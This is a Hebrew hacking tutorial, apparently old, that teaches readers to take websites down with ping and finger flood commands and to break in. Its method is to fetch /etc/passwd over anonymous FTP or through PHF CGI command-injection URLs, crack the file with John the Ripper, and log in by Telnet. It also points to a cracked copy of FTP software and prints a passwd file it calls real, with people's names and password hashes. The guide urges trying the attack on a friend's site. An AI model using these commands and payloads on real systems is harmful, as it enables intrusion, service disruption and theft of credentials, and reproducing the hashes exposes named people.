איך פורצים לאתר ? ~~~~~~~~~~~~~~~~~~~~ יש הרבה מאוד שיטות אבל יש להבדיל בין להפיל אתר לבין לפרוץ אותו, להפיל אותו זאת אומרת שהוא לא יעבוד ולפרוץ אותו זאת אומרת שאתם יכולים להעתיק לשנות להעלות ולמחוק ממנו קבצים ולגשת לכל קובץ שאתם רוצים באתר. בכל מה שקשור להפלת ולפריצת אתרים ושרתים יותר נוח וקל להשתמש במערכת הפעלה של לינוקס או יוניקס.
איך להפיל אתר ? אפשר להפיל אתר עם לחץ עליו אני יקרא לזה שיטת דפיקת בדלת אפשר לשלוח לו מידע עד שהסרבר שלו מתפוצץ ואז הוא מפסיק לעבוד לדוגמא: ping -t -l 256 xxx.xxx.xxx.xxx צריך לכתוב את הפקודה ב-DOS שהאיקסים הם האיי פי של האתר המינוס טי אומר שזה לא יפסיק ולא אומר כמה בייטים לשלוח לו אם אתם רוצים להגביר את הדפיקה בדלת צריך להרים את המספר 256 למספר יותר גבוה ולהפעיל בכמה חלונות. האיי פי של האתר רשום בדפדפן למטה כשאתם נכנסים לאתר, כשאתם מפילים אתר בשיטה הזאת הוא חייב להיות עם שרת משלו (לאתרים שנמצאים על אותו שרת יש כתובת איי פי זהה, לאתרים פרטיים אין בדרך-כלל שרת עצמאי משלהם והם ממוקמים על שרת אחר).
מומלץ להשתמש בלינוקס או יוניקס ולכתוב את הפקודה הזאת: finger @@@@@@@@@@@ http://webpage_goes_here תחליפו את כתובת האתר במה שאתם רוצים להפגיז אבל זה עובד רק ביוניקס ובלינוקס. שיטות אלה נקראות דפיקה בדלת מכיוון שדופקים עד שהיא מתפרקת.
אני מסתמך על זה שאני בין המאות היחידות בארץ שיש להם יוניקס אז בלפרוץ אתר אני ישתמש בפקודת לחלונות, בואו נתחיל יש הרבה מאוד שיטות להפלת אתרים, יש איזה מיליון שיטות לפרוץ לאתרים אבל יש שלוש מפורסמות: PHF, FTP, Exploit - אקספלויט היא הכי טובה הכי מקצועית והיא גם הכי מסובכת. שיטת ה- Exploits הכי טובה הכי מקצועית והכי מסובכת מבוססת על Telnet בדרך כלל. אני יכול להגיד לכם בגדול ששיטות האקספלויט מבוססות על תקלות נפוצות בשרתים שנמצאות בזמן מסוים. במסמך זה אני יסביר את שתי השיטות האחרות Anonymos FTP ו- PHF. אז פריצה לאתר (או לכל שרת אחר) היא בשלושה שלבים:
1. השגת קובץ passwd 2. פריצת קובץ ה- passwd עם קראקר ומציאת UserName ו- PassWord 3. כניסה לאתר דרך Telnet עם ה- UserName וה- PassWord שהישגתם
נזכרתי צריך גם אתר עליו אתם רוצים לפרוץ ... אני לא ממליץ לנסות לפרוץ לאתרים גדולים ומפורסמים לרוב יש FireWall וזה לא דבר שקל לעבור, לאתר של החבר דווקא כדאי לנסות בשביל הכיף. פריצת קובץ passwd זה לא ענין מסובך כמו שזה נשמע אתם צריכים להוריד קראקר Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper אני ממליץ על ארבעת אלה, למרות שחלק מהם עובדים רק על יוניקס. לי יותר קשה למצוא את הקובץ מלפרוץ אותו.
כדי לפרוץ לאתר צריכים: - FTP Client אפשר להוריד גירסת הדגמה מ: www.ftpvoyager.com ואחר-כך לחפש קראק לתוכנה ב-AstaLaVista.com כדי שתהיה לכם אפשרות להשתמש בתוכנה ללא הגבלת זמן. - Telnet Client אמור להיות בתיקית החלונות של כל מחשב שמחובר לאינטרנט - Password Cracker אפשר להוריד מ: /www.hackpalace.com/cracking/unix-passwords - Dictionary Word List אפשר להוריד מ: http://wacophreak.hypermart.net/archives.htm
הדרך הקלה ביותר (יחסית ליעילות שלה) היא אף טי פי אנונימי.
לפני שאנחנו משיגים את קובץ ה- passwd ניראה איך ניראה הקובץ. יש שני סוגים של קבצי passwd. הראשון שאני יסביר הוא UN-Shadowed Password File. הנה לדוגמא קובץ אמיתי שאני מצאתי:
fldl0001:oS6quCRbDkmuM:537:300:Diane Laing:/home/fldl0001:/bin/bash alastair:UZ9MFB7pOLvH6:540:100:Alastair Sommerville:/home/alastair:/bin/bash y2aberne:SjfSyVTnZ3ZT6:541:300:Kate Abernethy:/home/y2aberne:/bin/bash y2ronxin:Ter0LeetG7uH6:542:300:Maggie Ronxin:/home/y2ronxin:/bin/bash y2fair:.HocpfcuhgBbU:543:300:Jane Fair:/home/y2fair:/bin/bash y2mcbrid:faARb1ftg.xfg:544:300:Emma McBride:/home/y2mcbrid:/bin/bash y2hunter:HdXaBQoGpdR1Q:545:300:Gavin Hunter:/home/y2hunter:/bin/bash y2marsha:3dtDG9VDCAXAw:546:300:Ruth Marshall:/home/y2marsha:/bin/bash y2halket:AcuYHIXytcDac:547:300:Steven Halkett:/home/y2halket:/bin/bash y2macfar:g1k5tnbE3mn4w:548:300:Cassidy MacFarlane:/home/y2macfar:/bin/bash d2wilson:u7TfMN0MeKPjY:550:300:Robert Wilson:/home/d2wilson:/bin/bash d2hunter:b7wdUmJobrfuc:551:300:Douglas Hunter:/home/d2hunter:/bin/bash d2bell:k9SnbgYAdblnI:552:100:David Bell:/home/d2bell:/bin/bash d2lane:eArmBPOBOn3J.:553:300:David Lane:/home/d2lane:/bin/bash y2bentle:A725bDhP/gCNE:554:300:Scott Bentley:/home/y2bentle:/bin/bash
הקבצים יכולים להיות גם יותר ארוכים. באו ניקח שורה לדוגמא מהקובץ:
y2bentle:A725bDhP/gCNE:554:300:Scott Bentley:/home/y2bentle:/bin/bash
עכשיו אנחנו יכולים להבין את המבנה הבסיסי של קבצים מהסוג הזה:
Username:encrypted password:user number:group number:real name:home directory:type of shell
ועכשיו לסוג השני של הקבצים Shadowed Password Files: הנה עוד קובץ לדוגמא:
root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:31:Owner of many system processes:/root: operator:*:2:20:System &:/usr/guest/operator:/bin/csh bin:*:3:7:Binaries Commands and Source,,,:/:/nonexistent games:*:7:13:Games pseudo-user:/usr/games: news:*:8:8:News Subsystem:/:/nonexistent man:*:9:9:Mister Man Pages:/usr/share/man: uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico xten:*:67:67:X-10 daemon:/usr/local/xten:/nonexistent nobody:*:65534:65534:Unprivileged user:/nonexistent:/nonexistent ftp:*:14:5:Anonymous FTP Admin:/var/ftp:/bin/date y2bentle:*:554:300:Scott Bentley:/home/y2bentle:/bin/bash
אז עכשיו לחלק המעשי אתם צריכים להיכנס לאתר שאליו אתם רוצים לפרוץ דרך FTP, כדי להיכנס לאתר דרך אף טי פי בדפדפן צריך לרשום: ftp://webpage_goes_here אם אתם מנסים להיכנס דרך אף טי פי בדפדפן מומלץ מאוד להשתמש בנטסקייפ. כדאי לדעת שכמעט 99% מהשרתים לא מאפשרים כניסה דרך אף טי פי אנונימי. רוב הפעמים לא תצליחו ותיקבלו הודעות כמו: Anonymous Users Not Allowed מה שאומר שהאתר לא מאפשר או חוסם גישה לכניסה אנונימית דרך אף טי פי. במקרה שלא הצלחתם אתם יכולים להפעיל את FTP Client שהורדתם או כל תוכנת FTP אחרת ולנסות להיכנס, רוב הפעמים לא תצליחו, אז אתם צריכים לנסות לשחק עם ה-ports מה שקוראים באנגלית port surfing. אם האתר עליו ניסיתם להיכנס מוגן חזק דרך FireWall אז אתם צריכים להתחיל לעשות דברים כמו Trace כדי לראות איזה מחשבים עובדים עם המחשב הזה ולנסות לפרוץ עליהם. כשמנסים להיכנס לאתר דרך אף טי פי בתוכנת FTP Client צריכים למלא את הפרטים הבאים:
FTP SERVER-target goes here NAME-name of target goes here LOGIN NAME-anonymous PASSWORD-your email or "an" email address here
אם הצלחתם להיכנס לאתר ב- FTP דרך הדפדפן או דרך תוכנת FTP Client אתם אמורים לראות לפחות 4 תיקיות:
/bin /etc /lib /pub
תחפשו קובץ בשם passwd או בשם passwd.db בתיקיה etc ותעתיקו אותו למחשב שלכם.
שיטת ה-PHF לפריצת אתרי Web - אני לא בטוח אם מסמך זה יעזור למישהו, שיטת ה-PHF היא שיטה פשוטה מאוד אבל ביותר מ-99% מהפעמים היא לא עובדת, פעם היא עבדה אבל השרתים למדו להתגונן ממנה. כל מי שמבין קצת בהאקינג (ולא סתם מזין את המוח) יודע שכדי לפרוץ לאתר אתה צריך להיכנס לדף אנונימי להוריד את קובץ הפס וורד ולפרוץ אותו עם Cracker. אז הנה זה בא: http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd או: http://webpage_goes_here/cgi-bin/phf?Qalias=j00%ffcat%20/etc/passwd איפה שכתוב: webpage goes here כותבים את כתובת האתר. אם הצלחתם תראו את קובץ ה- passwd ותעתיקו אותו למחשב שלכם.
עכשיו אחרי שהישגתם את קובץ ה- passwd אתם צריכים להעתיק אותו לתיקיה של הקראקר ולהעתיק לתיקיה של הקראקר גם את קובץ ה-Dictionary Word List שהורדתם. אם אתם משתמשים בקראקר John the Ripper תיכנסו דרך DOS לתיקיה של הקראקר ותיכתבו: john -w:Dictionary_FileName_goes_here Password_FileName_goes_here הקראקר ינסה לחבר כל מילה שנמצאת ב-Dictionary Word List לבין הסיסמה המוסתרת בקובץ ה- passwd עד שהוא ימצא את השילוב המתאים. אם הצלחתם הוא יתן לכם UserName ו- PassWord ברוב הפעמים יותר מאחד. אם אתם משתמשים בקראקר Cracker Jack אתם חייבים לצאת מחלונות ל-DOS כי הקראקר חייב לעבוד במצב "אמיתי" של MS-DOS בגלל שהוא משתמש ב"זכרון נקי". כאשר תפעילו את הקראקר הוא ישאל אותכם לגבי ה- Password File וה- Dictionary File: PWfile(s): Password File Wordfile: Dictionary File
אחרי שהישגתם UserName ו -PassWord תפעילו את Telnet Client. עכשיו תלחצו על FILE - REMOTE SYSTEM ותכניסו את כתובת האתר, אחר-כך תצטרכו להכניס את ה- UserName וה- Password שהישגתם ופרצתם לאתר !!!
|
|